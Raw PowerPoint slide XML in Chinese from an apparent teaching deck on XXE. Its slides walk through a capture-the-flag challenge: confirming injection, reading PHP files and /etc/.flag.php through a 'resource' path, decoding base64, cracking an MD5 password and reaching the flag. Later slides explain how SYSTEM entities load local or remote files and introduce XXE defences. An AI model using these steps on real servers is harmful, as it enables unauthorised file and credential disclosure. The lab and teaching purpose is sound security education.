        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A81278A3-F0F7-42E0-B1AA-AA18437D644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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>构造如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，把用户名从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>summer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>改成了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>zzh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，成功验证出存在XXE漏洞注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A81278A3-F0F7-42E0-B1AA-AA18437D644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通过XXE注入,</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>尝试读取出现404的admin.php</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A81278A3-F0F7-42E0-B1AA-AA18437D644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把得到的被base64加密的结果放到burpsuite的【Decoder】模块进行解密，发现用户名为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>administhebest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，密码被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>md5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>加密，解密后密码破解，为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>admin@123</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显示如图，说明该用户名密码可能不是这个网址的用户信息</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err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用dirb扫描</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>目录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发现还存在一个admin.php文件</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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>尝试用刚才的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>账户密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>登录admin.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，出现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，点击后跳转到了一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>404</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>界面</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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>尝试用刚才的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>账户密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>登录admin.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，出现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，点击后跳转到了一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>404</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>界面，和之前处理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>admin.php404</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的办法一样</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>修改payload中resource后的文件名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>flagmeout.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>得到的文本用用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>解码，用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>base32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>解码，再用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>解码。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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>修改payload中resource后的文件名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>flag.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，把得到的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>加密文本解密，得到的代码进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在线运算，得到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>为图中红色方框圈画的内容SAFCSP{xxe_is_so_easy}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A81278A3-F0F7-42E0-B1AA-AA18437D6442}"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最后是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B9998D"/>
                </a:solidFill>
                <a:latin typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B9998D"/>
                </a:solidFill>
                <a:latin typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>漏洞防御办法介绍</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{EA43AF24-E1A5-49B7-A527-0F71E9AC1EDA}"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是针对</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语言的一种攻击。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>指可扩展标记语言。它是一种用于描述和传输数据的标记语言。 </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旨在为不同计算机系统之间的数据交换提供通用性。它使用标记来定义数据元素，而这些标记与文本组合来表示数据的结构和内容。由于其灵活性和可扩展性，</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已成为</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开发，特别是在面向</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服务的应用程序中常用的格式之一。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:scheme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大家可能在</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开发中更熟悉的是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>超文本标记语言。</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和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>都是面向</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开发的常用语言，其中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>被设计用来传输和存储数据，而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>则用来表现数据。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>比如，左边这张图就是一个用来描述职工的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>文档样本，其中的’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>name’,'salary’,'address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被称为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>的元素。</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A81278A3-F0F7-42E0-B1AA-AA18437D6442}"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AD6250E-D394-43D9-8472-C10F4E954144}"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0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pP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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>外部实体注入攻击的简称，原理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>是利用应用程序在解析</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文件时，未正确过滤外部实体的引用的漏洞，导致攻击者可以向应用程序注入恶意数据，并利用该漏洞实现各种攻击目的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>具体来说，</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攻击利用了</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解析器中处理外部实体引用时的一个特性：外部实体可以从本地系统或远程位置动态加载。攻击者可以构造恶意的</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文档，其中包含指向外部资源（如本地文件、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>等）的实体引用，并将该文档提交给受害者程序解析。当程序尝试解析文档并读取实体内容时，攻击者就可以向受害者程序中注入自己的代码或获得敏感信息，甚至可能控制整个系统。</a:t>
            </a:r>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有些</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文档包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>标识符定义的“实体”，这些</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文档会在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>DOCTYPE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>这个头部标签中呈现。这些定义的’实体’能够访问本地或者远程的内容。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:scheme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关键字‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>SYSTEM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>’会令</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解析器从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>URI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>中读取内容，并允许它在</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文档中被替换。因此，攻击者可以通过实体将他自定义的值发送给应用程序，强制</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解析器去访问攻击者指定的资源内容（可能是系统上本地文件亦或是远程系统上的文件）。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:scheme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比如这张图中，通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>标识符，外部实体</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>entityex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>在解析过程中会被替换为路径</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
